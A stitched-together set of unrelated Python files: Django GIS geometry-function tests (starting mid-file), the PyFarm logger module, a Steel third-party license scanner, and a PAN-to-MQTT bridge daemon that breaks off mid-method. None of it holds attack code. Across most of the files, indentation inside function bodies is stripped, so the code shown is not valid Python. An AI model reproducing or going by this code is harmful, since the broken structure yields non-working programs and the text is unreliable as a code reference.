# SELECT ST_GeoHash(point, 5) FROM geoapp_city WHERE name='Houston';
ref_hash = '9vk1mfq8jx0c8e0386z6'
h1 = City.objects.annotate(geohash=functions.GeoHash('point')).get(name='Houston')
h2 = City.objects.annotate(geohash=functions.GeoHash('point', precision=5)).get(name='Houston')
self.assertEqual(ref_hash, h1.geohash)
self.assertEqual(ref_hash[:5], h2.geohash)
# Intersection() of each country with a fixed point equals the GEOS
# intersection, except on backends that return NULL for empty results.
@skipUnlessDBFeature("has_Intersection_function")
def test_intersection(self):
geom = Point(5, 23, srid=4326)
qs = Country.objects.annotate(inter=functions.Intersection('mpoly', geom))
for c in qs:
if spatialite or mysql:
# When the intersection is empty, Spatialite and MySQL return None
expected = None
else:
expected = c.mpoly.intersection(geom)
self.assertEqual(c.inter, expected)
@skipUnlessDBFeature("has_MemSize_function")
def test_memsize(self):
    """MemSize() yields a plausible byte count for a point geometry."""
    city = City.objects.annotate(size=functions.MemSize('point')).get(name='Pueblo')
    # Exact value may depend on PostGIS version.
    self.assertTrue(20 <= city.size <= 40)
# NumGeometries() counts members of a collection; on non-collection
# geometries the result differs by backend (1 vs. None on MySQL).
@skipUnlessDBFeature("has_NumGeom_function")
def test_num_geom(self):
# Both 'countries' only have two geometries.
for c in Country.objects.annotate(num_geom=functions.NumGeometries('mpoly')):
self.assertEqual(2, c.num_geom)
qs = City.objects.filter(point__isnull=False).annotate(num_geom=functions.NumGeometries('point'))
for city in qs:
# Oracle and PostGIS return 1 for the number of geometries on
# non-collections, whereas MySQL returns None.
if mysql:
self.assertIsNone(city.num_geom)
else:
self.assertEqual(1, city.num_geom)
# NumPoints() on a linestring counts its vertices; support for other
# geometry types varies per backend, hence the early return below.
@skipUnlessDBFeature("has_NumPoint_function")
def test_num_points(self):
coords = [(-95.363151, 29.763374), (-95.448601, 29.713803)]
Track.objects.create(name='Foo', line=LineString(coords))
qs = Track.objects.annotate(num_points=functions.NumPoints('line'))
self.assertEqual(qs.first().num_points, 2)
if spatialite or mysql:
# Spatialite and MySQL can only count points on LineStrings
return
for c in Country.objects.annotate(num_points=functions.NumPoints('mpoly')):
self.assertEqual(c.mpoly.num_points, c.num_points)
if not oracle:
# Oracle cannot count vertices in Point geometries.
for c in City.objects.annotate(num_points=functions.NumPoints('point')):
self.assertEqual(1, c.num_points)
# PointOnSurface() is checked against per-backend reference points:
# hard-coded WKT for Oracle, GEOS-computed values elsewhere.
@skipUnlessDBFeature("has_PointOnSurface_function")
def test_point_on_surface(self):
# Reference values.
if oracle:
# SELECT SDO_UTIL.TO_WKTGEOMETRY(SDO_GEOM.SDO_POINTONSURFACE(GEOAPP_COUNTRY.MPOLY, 0.05))
# FROM GEOAPP_COUNTRY;
ref = {'New Zealand': fromstr('POINT (174.616364 -36.100861)', srid=4326),
'Texas': fromstr('POINT (-103.002434 36.500397)', srid=4326),
}
else:
# Using GEOSGeometry to compute the reference point on surface values
# -- since PostGIS also uses GEOS these should be the same.
ref = {'New Zealand': Country.objects.get(name='New Zealand').mpoly.point_on_surface,
'Texas': Country.objects.get(name='Texas').mpoly.point_on_surface
}
qs = Country.objects.annotate(point_on_surface=functions.PointOnSurface('mpoly'))
for country in qs:
tol = 0.00001  # Spatialite might have WKT-translation-related precision issues
self.assertTrue(ref[country.name].equals_exact(country.point_on_surface, tol))
@skipUnlessDBFeature("has_Reverse_function")
def test_reverse_geom(self):
    """Reverse() flips the vertex order of a linestring."""
    coords = [(-95.363151, 29.763374), (-95.448601, 29.713803)]
    Track.objects.create(name='Foo', line=LineString(coords))
    track = Track.objects.annotate(reverse_geom=functions.Reverse('line')).get(name='Foo')
    self.assertEqual(tuple(reversed(coords)), track.reverse_geom.coords)
# Scale() multiplies every coordinate by the given x/y factors; both int
# and float/Decimal factors must be accepted.
@skipUnlessDBFeature("has_Scale_function")
def test_scale(self):
xfac, yfac = 2, 3
tol = 5  # The low precision tolerance is for SpatiaLite
qs = Country.objects.annotate(scaled=functions.Scale('mpoly', xfac, yfac))
# Walk polygons -> rings -> coordinates in lockstep with the original.
for country in qs:
for p1, p2 in zip(country.mpoly, country.scaled):
for r1, r2 in zip(p1, p2):
for c1, c2 in zip(r1.coords, r2.coords):
self.assertAlmostEqual(c1[0] * xfac, c2[0], tol)
self.assertAlmostEqual(c1[1] * yfac, c2[1], tol)
# Test float/Decimal values
qs = Country.objects.annotate(scaled=functions.Scale('mpoly', 1.5, Decimal('2.5')))
self.assertGreater(qs[0].scaled.area, qs[0].mpoly.area)
# SnapToGrid() accepts 1 (size), 2 (x/y sizes) or 4 (x/y sizes + origin)
# numeric arguments; wrong counts raise ValueError, wrong types TypeError.
# The results are compared against reference PostGIS output.
@skipUnlessDBFeature("has_SnapToGrid_function")
def test_snap_to_grid(self):
# Let's try and break snap_to_grid() with bad combinations of arguments.
for bad_args in ((), range(3), range(5)):
with self.assertRaises(ValueError):
Country.objects.annotate(snap=functions.SnapToGrid('mpoly', *bad_args))
for bad_args in (('1.0',), (1.0, None), tuple(map(six.text_type, range(4)))):
with self.assertRaises(TypeError):
Country.objects.annotate(snap=functions.SnapToGrid('mpoly', *bad_args))
# Boundary for San Marino, courtesy of Bjorn Sandvik of thematicmapping.org
# from the world borders dataset he provides.
wkt = ('MULTIPOLYGON(((12.41580 43.95795,12.45055 43.97972,12.45389 43.98167,'
'12.46250 43.98472,12.47167 43.98694,12.49278 43.98917,'
'12.50555 43.98861,12.51000 43.98694,12.51028 43.98277,'
'12.51167 43.94333,12.51056 43.93916,12.49639 43.92333,'
'12.49500 43.91472,12.48778 43.90583,12.47444 43.89722,'
'12.46472 43.89555,12.45917 43.89611,12.41639 43.90472,'
'12.41222 43.90610,12.40782 43.91366,12.40389 43.92667,'
'12.40500 43.94833,12.40889 43.95499,12.41580 43.95795)))')
Country.objects.create(name='San Marino', mpoly=fromstr(wkt))
# Because floating-point arithmetic isn't exact, we set a tolerance
# to pass into GEOS `equals_exact`.
tol = 0.000000001
# SELECT AsText(ST_SnapToGrid("geoapp_country"."mpoly", 0.1)) FROM "geoapp_country"
# WHERE "geoapp_country"."name" = 'San Marino';
ref = fromstr('MULTIPOLYGON(((12.4 44,12.5 44,12.5 43.9,12.4 43.9,12.4 44)))')
self.assertTrue(
ref.equals_exact(
Country.objects.annotate(
snap=functions.SnapToGrid('mpoly', 0.1)
).get(name='San Marino').snap,
tol
)
)
# SELECT AsText(ST_SnapToGrid("geoapp_country"."mpoly", 0.05, 0.23)) FROM "geoapp_country"
# WHERE "geoapp_country"."name" = 'San Marino';
ref = fromstr('MULTIPOLYGON(((12.4 43.93,12.45 43.93,12.5 43.93,12.45 43.93,12.4 43.93)))')
self.assertTrue(
ref.equals_exact(
Country.objects.annotate(
snap=functions.SnapToGrid('mpoly', 0.05, 0.23)
).get(name='San Marino').snap,
tol
)
)
# SELECT AsText(ST_SnapToGrid("geoapp_country"."mpoly", 0.05, 0.23, 0.5, 0.17)) FROM "geoapp_country"
# WHERE "geoapp_country"."name" = 'San Marino';
ref = fromstr(
'MULTIPOLYGON(((12.4 43.87,12.45 43.87,12.45 44.1,12.5 44.1,12.5 43.87,12.45 43.87,12.4 43.87)))'
)
self.assertTrue(
ref.equals_exact(
Country.objects.annotate(
snap=functions.SnapToGrid('mpoly', 0.05, 0.23, 0.5, 0.17)
).get(name='San Marino').snap,
tol
)
)
@skipUnlessDBFeature("has_SymDifference_function")
def test_sym_difference(self):
    """SymDifference() annotation agrees with the GEOS sym_difference."""
    pnt = Point(5, 23, srid=4326)
    annotated = Country.objects.annotate(sym_difference=functions.SymDifference('mpoly', pnt))
    for country in annotated:
        expected = country.mpoly.sym_difference(pnt)
        self.assertTrue(expected.equals(country.sym_difference))
# Transform() reprojects a point into the target SRID; the result is
# compared against a pre-transformed reference point.
@skipUnlessDBFeature("has_Transform_function")
def test_transform(self):
# Pre-transformed points for Houston and Pueblo.
ptown = fromstr('POINT(992363.390841912 481455.395105533)', srid=2774)
prec = 3  # Precision is low due to version variations in PROJ and GDAL.
# Asserting the result of the transform operation with the values in
# the pre-transformed points.
h = City.objects.annotate(pt=functions.Transform('point', ptown.srid)).get(name='Pueblo')
self.assertEqual(2774, h.pt.srid)
self.assertAlmostEqual(ptown.x, h.pt.x, prec)
self.assertAlmostEqual(ptown.y, h.pt.y, prec)
# Translate() offsets every coordinate by the given x/y deltas.
@skipUnlessDBFeature("has_Translate_function")
def test_translate(self):
xfac, yfac = 5, -23
qs = Country.objects.annotate(translated=functions.Translate('mpoly', xfac, yfac))
# Walk polygons -> rings -> coordinates in lockstep with the original.
for c in qs:
for p1, p2 in zip(c.mpoly, c.translated):
for r1, r2 in zip(p1, p2):
for c1, c2 in zip(r1.coords, r2.coords):
# The low precision is for SpatiaLite
self.assertAlmostEqual(c1[0] + xfac, c2[0], 5)
self.assertAlmostEqual(c1[1] + yfac, c2[1], 5)
# Some combined function tests
@skipUnlessDBFeature(
"has_Difference_function", "has_Intersection_function",
"has_SymDifference_function", "has_Union_function")
def test_diff_intersection_union(self):
"Testing the `difference`, `intersection`, `sym_difference`, and `union` GeoQuerySet methods."
geom = Point(5, 23, srid=4326)
qs = Country.objects.all().annotate(
difference=functions.Difference('mpoly', geom),
sym_difference=functions.SymDifference('mpoly', geom),
union=functions.Union('mpoly', geom),
)
# For some reason SpatiaLite does something screwy with the Texas geometry here.
# Also, it doesn't like the null intersection.
if spatialite:
qs = qs.exclude(name='Texas')
else:
qs = qs.annotate(intersection=functions.Intersection('mpoly', geom))
if oracle:
# Should be able to execute the queries; however, they won't be the same
# as GEOS (because Oracle doesn't use GEOS internally like PostGIS or
# SpatiaLite).
return
# Compare every annotation against its GEOS equivalent.
for c in qs:
self.assertTrue(c.mpoly.difference(geom).equals(c.difference))
if not (spatialite or mysql):
self.assertEqual(c.mpoly.intersection(geom), c.intersection)
self.assertTrue(c.mpoly.sym_difference(geom).equals(c.sym_difference))
self.assertTrue(c.mpoly.union(geom).equals(c.union))
# Union() of two points yields a multipoint; the member order is
# backend-dependent so both orderings are accepted.
@skipUnlessDBFeature("has_Union_function")
def test_union(self):
geom = Point(-95.363151, 29.763374, srid=4326)
ptown = City.objects.annotate(union=functions.Union('point', geom)).get(name='Dallas')
tol = 0.00001
# Undefined ordering
expected1 = fromstr('MULTIPOINT(-96.801611 32.782057,-95.363151 29.763374)', srid=4326)
expected2 = fromstr('MULTIPOINT(-95.363151 29.763374,-96.801611 32.782057)', srid=4326)
self.assertTrue(expected1.equals_exact(ptown.union, tol) or expected2.equals_exact(ptown.union, tol))
| |
# No shebang line, this module is meant to be imported
#
# Copyright 2013 Oliver Palmer
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Logger
======
Contains the root logger for PyFarm as well as the default
message formatting.
"""
import os
import sys
import json
import logging
import warnings
from logging import Formatter
from pyfarm.core.enums import INTERACTIVE_INTERPRETER
# Import or construct the necessary objects depending on the Python version
# and use sys.version_info directly to avoid possible circular import issues.
PY_MAJOR, PY_MINOR = sys.version_info[0:2]
# BUG FIX: `PY26 = PY_MAJOR, PY_MINOR == (2, 6)` built the 2-tuple
# (PY_MAJOR, <bool>), which is *always* truthy, so every `if PY26:` branch
# in this module was taken regardless of the interpreter version.
# Parenthesize so PY26 is the intended boolean version comparison.
PY26 = (PY_MAJOR, PY_MINOR) == (2, 6)
if (PY_MAJOR, PY_MINOR) >= (2, 7):
    from logging import NullHandler, captureWarnings
    from logging.config import dictConfig
else:  # pragma: no cover
    # Python 2.6 lacks NullHandler/dictConfig in the stdlib; use logutils.
    from logutils import NullHandler
    from logutils.dictconfig import dictConfig
# Saved reference to the original warnings.showwarning; restored when
# captureWarnings(False) is called below.
_warnings_showwarning = None
def _showwarning(message, category, filename, lineno, file=None, line=None):
"""
.. note::
This function is a copy of Python 2.7's ``_showwarning``
Implementation of showwarnings which redirects to logging, which will
first check to see if the file parameter is None. If a file is
specified, it will delegate to the original warnings implementation of
showwarning. Otherwise, it will call warnings.formatwarning and will
log the resulting string to a warnings logger named "py.warnings" with
level logging.WARNING.
"""
if file is not None:
if _warnings_showwarning is not None:
_warnings_showwarning(
message, category, filename, lineno, file, line)
else:
s = warnings.formatwarning(
message, category, filename, lineno, line)
logger = logging.getLogger("py.warnings")
if not logger.handlers:
# Avoid "No handlers could be found" noise on unconfigured loggers.
logger.addHandler(NullHandler())
logger.warning("%s", s)
def captureWarnings(capture):
"""
.. note::
This function is a copy of Python 2.7's ``captureWarnings``
If capture is true, redirect all warnings to the logging package.
If capture is False, ensure that warnings are not redirected to logging
but to their original destinations.
"""
global _warnings_showwarning
if capture:
# Stash the original hook only once so repeated calls are idempotent.
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = _showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
# Colorized output is only set up outside of interactive interpreters.
# NOTE(review): the bare-name probe below presumably guards against
# re-running init() on module re-execution, but `from colorama import ...`
# never binds the name `colorama`, so the NameError path always runs the
# first time -- confirm this is intentional.
if not INTERACTIVE_INTERPRETER:
try:
colorama
except NameError:
from colorama import init, Fore, Back, Style
init()
# (head, tail) escape-code pair used when no styling should be applied.
NO_STYLE = ("", "")
class ColorFormatter(Formatter):
"""
Adds colorized formatting to log messages using :mod:`colorama` so long
as we're not running an interactive interpreter or a debugger.
"""
# FORMATS maps a log level to a (prefix, suffix) escape-code pair that
# wraps the formatted record text.
if not INTERACTIVE_INTERPRETER:
FORMATS = {
logging.DEBUG: (Style.DIM, Style.RESET_ALL),
logging.WARNING: (Fore.YELLOW, Fore.RESET),
logging.ERROR: (Fore.RED, Fore.RESET),
logging.CRITICAL: (
Fore.RED + Style.BRIGHT, Fore.RESET + Style.RESET_ALL)}
# Python 2.6 uses old style classes which means we can't use
# super(). So we construct the proper method at the class level
# so we can safe an if statement for each function call.
if not PY26:  # pragma: no cover
def format(self, record):
head, tail = self.FORMATS.get(record.levelno, NO_STYLE)
return head + super(ColorFormatter, self).format(record) + tail
else:  # pragma: no cover
def format(self, record):
head, tail = self.FORMATS.get(record.levelno, NO_STYLE)
return head + Formatter.format(self, record) + tail
else:
warnings.warn_explicit(
"Interactive interpreter or debugger is active, "
"disabling colorized logging.", RuntimeWarning, "logger.py",
0, module="pyfarm.core.logger")
# No styling at all when interactive: every level maps to NO_STYLE.
FORMATS = {
logging.DEBUG: NO_STYLE,
logging.WARNING: NO_STYLE,
logging.ERROR: NO_STYLE,
logging.CRITICAL: NO_STYLE}
class StandardOutputStreamHandler(logging.StreamHandler):
"""
This is exactly the same as :class:`logging.StreamHandler` the
only exception is we use ``sys.stdout`` by default. This class is
provided so it can be serialized as a string into a logging configuration
dictionary using json.
"""
# Python 2.6's StreamHandler is an old-style class, so super() cannot be
# used there; pick the right __init__ form at class-definition time.
if PY26:
def __init__(self, stream=sys.stdout):
logging.StreamHandler.__init__(self, stream)
else:
def __init__(self, stream=sys.stdout):
super(StandardOutputStreamHandler, self).__init__(stream=stream)
class config(object):
"""
Namespace class to store and setup the logging configuration. You
typically don't have to run the classmethods here manually but you may
do so under other circumstances if you wish.
"""
# Flag so setup() only runs dictConfig() once unless reconfigure=True.
CONFIGURED = False
# dictConfig-style configuration used when $PYFARM_LOGGING_CONFIG is unset.
DEFAULT_CONFIGURATION = {
"version": 1,
"root": {
"level": os.environ.get("PYFARM_ROOT_LOGLEVEL", "DEBUG"),
"handlers": ["stdout"],
},
"handlers": {
"stdout": {
"class": "pyfarm.core.logger.StandardOutputStreamHandler",
"formatter": "colorized"
}
},
"formatters": {
"colorized": {
"()": "pyfarm.core.logger.ColorFormatter",
"datefmt": "%Y-%m-%d %H:%M:%S",
"format":
"%(asctime)s %(levelname)-8s - %(name)-15s - %(message)s"
}
}
}
@classmethod
def get(cls):
"""
Retrieves the logging configuration. By default this searches
:envvar:`PYFARM_LOGGING_CONFIG` for either a json blob containing
the logging configuration or a path to a json blob on disk. If
:envvar:`PYFARM_LOGGING_CONFIG` is not set then this function falls
back on :const:`pyfarm.core.logger.DEFAULT_CONFIGURATION`.
"""
# nothing left to do if it's not in the environment
if "PYFARM_LOGGING_CONFIG" not in os.environ:
return cls.DEFAULT_CONFIGURATION.copy()
environment_config = os.environ["PYFARM_LOGGING_CONFIG"].strip()
if not environment_config:
raise ValueError("$PYFARM_LOGGING_CONFIG is empty")
# Treat the value as a file path first; if it cannot be opened, fall
# back to parsing the value itself as a json blob.
try:
with open(environment_config, "r") as stream:
try:
return json.load(stream)
except ValueError:
raise ValueError(
"Failed to parse json data from %s" % stream.name)
except (OSError, IOError):
try:
return json.loads(environment_config)
except ValueError:
raise ValueError(
"Failed to parse json data from $PYFARM_LOGGING_CONFIG")
@classmethod
def setup(cls, capture_warnings=True, reconfigure=False):
"""
Retrieves the logging configuration using :func:`get` and
then calls :meth:`.dictConfig` on the results.
:type capture_warnings: bool
:param capture_warnings:
If True then all emissions from :mod:`warnings` should instead
be logged
:type reconfigure: bool
:param reconfigure:
If True then rerun :func:`.dictConfig` even if we've already done
so.
"""
if not reconfigure and cls.CONFIGURED:
return
dictConfig(cls.get())
if capture_warnings:
captureWarnings(True)
cls.CONFIGURED = True
def getLogger(name):
    """
    Wrapper around :func:`logging.getLogger` which makes sure logging has
    been configured and that the returned logger name carries the ``pf.``
    prefix.
    """
    config.setup()
    prefixed = name if name.startswith("pf.") else "pf.%s" % name
    return logging.getLogger(prefixed)
| |
#!/usr/bin/python
# Copyright 2014 Google Inc. All Rights Reserved.
"""License checking utility.
Utility for checking and processing licensing information in third_party
directories.
Usage: steel_licenses.py <command> <build_dir> [<output_file>]
build_dir is the directory where build products are generated.
Commands:
scan scan third_party directories, verifying that we have licensing info
license generate license HTML information to output file, or stdout.
"""
import fnmatch
import os
import re
import subprocess
import sys
def NativePath(path):
  """Return *path* converted to a Windows path under cygwin, unchanged otherwise."""
  if sys.platform != 'cygwin':
    return path
  import cygpath  # pylint: disable=g-import-not-at-top
  return cygpath.to_nt(path)
# Locate the chromium tools checkout relative to this script and make the
# upstream `licenses` module importable before customizing its tables.
script_dir = os.path.abspath(os.path.dirname(__file__))
toplevel_dir = os.path.dirname(os.path.dirname(script_dir))
tools_dir = os.path.join(toplevel_dir, 'external', 'chromium', 'tools')
sys.path.insert(0, tools_dir)
import licenses  # pylint: disable=g-import-not-at-top
# Set by main() to the build products directory before any scanning runs.
build_dir = ''
# LayoutTests contains thousands of non-code directories, skip it.
licenses.PRUNE_DIRS += ('.repo', 'LayoutTests')
# Extra roots (beyond third_party) that carry their own license metadata.
STEEL_ADDITIONAL_PATHS = (
os.path.join(toplevel_dir, 'external', 'chromium'),
os.path.join(toplevel_dir, 'external', 'openssl'),
)
# Paths from the root of the tree to directories to skip.
STEEL_PRUNE_PATHS = set([
# Same module occurs in both the top-level third_party and others.
os.path.join('third_party', 'jemalloc'),
# Assume we will never use anything from chrome or v8.
'chrome',
'v8',
])
licenses.ADDITIONAL_PATHS += STEEL_ADDITIONAL_PATHS
# Exclude this hardcoded path from licenses.py.
licenses.ADDITIONAL_PATHS = [
p for p in licenses.ADDITIONAL_PATHS
if p != os.path.join('v8', 'strongtalk')
]
licenses.PRUNE_PATHS |= STEEL_PRUNE_PATHS
# Directories where we check out directly from upstream, and therefore
# can't provide a README.chromium. Please prefer a README.chromium
# wherever possible.
# Default License File is "LICENSE"
STEEL_SPECIAL_CASES = {
os.path.join(toplevel_dir, 'external', 'chromium'): {
'Name': 'Chromium',
'URL': 'http://chromium.org',
'License': 'BSD',
},
os.path.join('third_party', 'freetype'): {
'Name': 'FreeType',
'URL': 'http://freetype.org',
'License': 'The FreeType Project LICENSE',
'License File': 'docs/FTL.TXT',
},
os.path.join('third_party', 'skia'): {
'Name': 'Skia',
'URL': 'http://chromium.org',
'License': 'BSD',
},
}
# we don't use v8
del licenses.SPECIAL_CASES[os.path.join('v8')]
# Merge upstream special cases with ours (ours win on key collisions).
licenses.SPECIAL_CASES = dict(
licenses.SPECIAL_CASES.items() + STEEL_SPECIAL_CASES.items())
def FindThirdPartyDependencies():
  """Scan Makefile deps to find all third_party uses.

  Reads every ``*.d`` dependency file under ``build_dir`` and queries the
  ninja deps database, collecting the first path component after any
  ``third_party/`` reference.

  Returns:
    A set of third_party subdirectory names referenced by the build.
  """
  third_party_deps = set()
  # Match third_party/<foo>/...
  third_party_re = re.compile(r'third_party[\\/]([^ \t\n\r\f\v/\\]*)')
  if not os.path.exists(build_dir):
    print >> sys.stderr, 'Build directory', build_dir, 'does not exist'
  for path, _, files in os.walk(build_dir):
    for dep in fnmatch.filter(files, '*.d'):
      # FIX: close each .d file deterministically -- the previous code
      # opened a handle per file and never closed it.
      with open(os.path.join(path, dep), 'r') as f:
        dep_text = f.read()
      third_party_deps.update(third_party_re.findall(dep_text))
  # Query the ninja deps database (this is mutually exclusive with .d files).
  # Use -n to avoid trying to open the deps log for write. ninja is probably
  # already running.
  ninja_deps = subprocess.check_output(
      ['ninja', '-n', '-C', NativePath(build_dir), '-t', 'deps'])
  third_party_deps.update(third_party_re.findall(ninja_deps))
  return third_party_deps
def CreateSteelPruneList(third_party_dirs):
  """Generate a list of third_party directories we don't use.

  Args:
    third_party_dirs: iterable of third_party directory paths found on disk.

  Returns:
    The subset of third_party_dirs that no build product depends on.

  Raises:
    licenses.LicenseError: if no build dependencies were found at all.
  """
  third_party_deps = FindThirdPartyDependencies()
  if not third_party_deps:
    raise licenses.LicenseError(
        'No dependencies found. Check the build directory.')
  # Compile each dependency pattern once, instead of re-compiling every
  # pattern for every directory as the old found-flag loop did.
  dep_patterns = [re.compile(d) for d in third_party_deps]
  prune_paths = set()
  for f in third_party_dirs:
    # Only third_party paths are candidates for pruning.
    if 'third_party' not in f:
      continue
    if not any(pattern.search(f) for pattern in dep_patterns):
      prune_paths.add(f)
  return prune_paths
def GenerateLicense(output_filename=None):
"""Generate list of licenses in html form.
Dumps the result to output file.
Args:
output_filename: Filename to write the license.html to.
Writes to stdout if None.
Returns:
0 on success.
"""
chromium_root = os.path.join(toplevel_dir, 'external', 'chromium')
third_party_dirs = set(licenses.FindThirdPartyDirs(licenses.PRUNE_PATHS,
chromium_root))
# Drop directories nothing in the build actually depends on.
prune_paths = CreateSteelPruneList(third_party_dirs)
third_party_dirs -= prune_paths
entries = []
for path in sorted(third_party_dirs):
try:
metadata = licenses.ParseDir(path, chromium_root)
except licenses.LicenseError:
# Incomplete metadata is reported but does not abort the run.
print >> sys.stderr, ('WARNING: licensing info for ' + path +
' is incomplete, skipping.')
continue
if metadata['License File'] != 'NOT_SHIPPED':
env = {
'name': metadata['Name'],
'url': metadata['URL'],
'license': open(metadata['License File'], 'rb').read(),
}
entries.append(env)
if output_filename:
output_file = open(output_filename, 'wb')
else:
output_file = sys.stdout
# Emit one <h4>name</h4><pre>license text</pre> section per entry.
for e in entries:
output_file.write('<h4>\n')
output_file.write(e['name'] + '\n')
output_file.write('</h4>\n')
output_file.write('<pre>\n')
output_file.write(e['license'] + '\n')
output_file.write('</pre>\n')
return 0
def ScanDirectories():
"""Verify all directories (that we use) have valid license information."""
# The functions we call in licenses.py assume we are at the root.
os.chdir(toplevel_dir)
# Add all the directories we don't use to PRUNE_PATHS.
third_party_dirs = set(
licenses.FindThirdPartyDirs(licenses.PRUNE_PATHS, os.getcwd()))
prune_paths = CreateSteelPruneList(third_party_dirs)
licenses.PRUNE_PATHS = set(licenses.PRUNE_PATHS) | prune_paths
# Now verify the presence of a license file in all our third party dirs.
# Returns 1 (truthy) on success; falls through to None when the scan
# reported problems -- main() treats a falsy return as failure.
if licenses.ScanThirdPartyDirs():
print 'scan successful.'
return 1
def main():
"""Dispatch the 'scan' or 'license' command; print usage otherwise."""
command = 'help'
# Both commands require at least <command> <build_dir>.
if len(sys.argv) > 2:
command = sys.argv[1]
global build_dir
build_dir = os.path.abspath(sys.argv[2])
if command == 'scan':
if not ScanDirectories():
return 1
elif command == 'license':
# Optional third argument names the output file; stdout otherwise.
if len(sys.argv) > 3:
output_filename = sys.argv[3]
else:
output_filename = None
return GenerateLicense(output_filename)
else:
print __doc__
return 1
if __name__ == '__main__':
sys.exit(main())
| |
#!/usr/bin/python
# -*- coding:utf-8 -*-
#dependence: paho-mqtt (pip install paho-mqtt)
# XBee (pip install XBee)
# PyYAML (pip install PyYaml)
# pyserial (pip install pyserial)
import os
import sys
import time
import logging
import yaml
from serial import Serial
from factory import *
from pan import *
from filters import *
from plugins import *
from paho.mqtt import client
from daemon import Daemon
import sqlite3 as database
class PAN2MQTT(Daemon):
"""
PAN network to MQTT bridge
Supported PAN radio: XBee, Mesh Bee(from seeedstudio)
To port a new radio driver, two method must be implemented: on_message, send_message
"""
def __init__ (self, logger, cfg):
"""
Wire up the PAN radio driver (via Factory) and the MQTT client from the
parsed YAML configuration; exits the process when no driver can be built.
"""
Daemon.__init__(self,cfg['general']['pidfile'])
self.logger = logger
self.config = cfg
self.mqtt_connected = False
self.mqtt_subcriptions = {}
self.downlink_topics = {}
self.uplink_topics = {}
self.pan = Factory(self.config['pan']['driver_class'])
if not self.pan:
self.__log(logging.ERROR, "Can't instant pan driver")
sys.exit(2)
self.pan.logger = logger
self.pan.on_message = self.on_message_from_pan
self.stdout = self.config['general']['stdout']
self.stderr = self.config['general']['stdout']
self.host = self.config['mqtt']['host']
self.client_id = self.config['mqtt']['client_id']
self.mqtt_qos = self.config['mqtt']['qos']
self.mqtt_retain = self.config['mqtt']['retain']
self.status_topic = self.config['mqtt']['status_topic']
self.mqtt_client = client.Client(self.client_id, self.config['mqtt']['clean_session'])
if self.__try_get_config(self.config['mqtt'], "username", None):
self.mqtt_client.username_pw_set(self.config['mqtt']['username'], self.config['mqtt']['password'])
if self.config['mqtt']['set_will']:
self.mqtt_client.will_set(self.status_topic.format(client_id=self.client_id), "0", self.mqtt_qos, self.mqtt_retain)
self.mqtt_client.on_connect = self.on_mqtt_connect
self.mqtt_client.on_disconnect = self.on_mqtt_disconnect
self.mqtt_client.on_message = self.on_message_from_mqtt
self.mqtt_client.on_subscribe = self.on_mqtt_subscribe
self.mqtt_client.on_log = self.on_mqtt_log
self.plugins = self.__try_get_config(self.config, 'plugin', None)
# NOTE(review): wrapping a non-dict plugin value in a *set* literal looks
# suspicious -- run() iterates self.plugins for names; confirm a dict was
# not intended here.
if not isinstance(self.plugins, dict):
self.plugins = {self.plugins}
self.plugins_ins = {}
### private method
def __log(self, level, message):
# Logging is optional; silently drop messages when no logger was given.
if self.logger:
self.logger.log(level, message)
@staticmethod
def __try_get_config (parent, key, default):
# Dictionary lookup with a default; the broad except also swallows
# TypeError when `parent` is not a mapping.
try:
return parent[key]
except:
return default
def __parse_nodes (self):
# Build the uplink map ((mac, match_key) -> (topic, filter)) and the
# downlink map (topic -> (mac, topic config)) from the YAML node list.
self.downlink_topics = {}
self.uplink_topics = {}
if self.config['pan']['nodes']:
for mac,mac_obj in self.config['pan']['nodes'].items():
for topic,topic_content in mac_obj.items():
topic = topic.format(client_id=self.client_id)
if topic_content['dir'] == "uplink":
self.uplink_topics[(mac, topic_content['match_key'])] = (topic,self.__try_get_config(topic_content,'filter',None))
elif topic_content['dir'] == "downlink":
self.downlink_topics[topic] = (mac, topic_content)
else:
self.__log(logging.ERROR, "Unknown 'dir'")
def __sub_downlink_topics (self):
# Subscribe to every downlink topic; mid -> topic is remembered so the
# SUBACK callback can report which subscription was confirmed.
if not self.mqtt_connected:
return
for t in self.downlink_topics:
rc, mid = self.mqtt_client.subscribe(t, self.mqtt_qos)
self.mqtt_subcriptions[mid] = t
self.__log(logging.INFO, "Sent subscription request to topic %s" % t)
def __filter (self, input, filter_config):
# Apply a configured filter to a payload; any failure (bad config,
# filter error) falls through and returns the input unchanged.
try:
filter = Factory(filter_config['type'])
if filter:
filter.configure(filter_config['parameters'])
if filter.validate():
return filter.process(input)
except:
pass
return input
#response topic list to client which requires this
def __resp_topic_list(self, dst_topic):
'''
Broadcast gateway information when the gateway thread is starting
'''
# "@"-joined list of all non-listening uplink topics, published at QoS 2.
str_topic_holder = ''
if self.config['pan']['nodes']:
for mac,mac_obj in self.config['pan']['nodes'].items():
for topic,topic_content in mac_obj.items():
topic = topic.format(client_id=self.client_id)
if topic_content['dir'] == "uplink" and topic_content['type'] != "listening":
str_topic_holder = str_topic_holder + topic + "@"
print "topic list:" + str_topic_holder
self.mqtt_client.publish(dst_topic, str_topic_holder, 2)
###
def on_mqtt_connect (self, client, userdata, flags, rc):
# rc == 0 means success; publish "1" on the status topic and subscribe
# to the downlink topics.
if rc == 0:
self.__log(logging.INFO, "Connected to MQTT broker: %s" % self.host)
self.mqtt_client.publish(self.status_topic.format(client_id=self.client_id), "1")
self.mqtt_connected = True
self.__sub_downlink_topics()
else:
self.__log(logging.ERROR, "Could not connect to MQTT broker: %s" % self.host)
self.__log(logging.ERROR, "Error code: %d" % rc)
self.mqtt_connected = False
def on_mqtt_disconnect (self, client, userdata, rc):
self.mqtt_connected = False
self.__log(logging.INFO, "Disconnected from MQTT broker: %s"%self.host)
self.__log(logging.INFO, "Return code: %d"%rc)
if rc!=0:
self.__log(logging.ERROR, "Unexpected disconnect, waiting reconnect...")
def on_mqtt_subscribe (self,client, userdata, mid, granted_qos):
topic = self.mqtt_subcriptions.get(mid, "Unknown")
self.__log(logging.INFO, "Sub to topic %s confirmed"%topic)
def on_mqtt_log (self, client, userdata, level, buf):
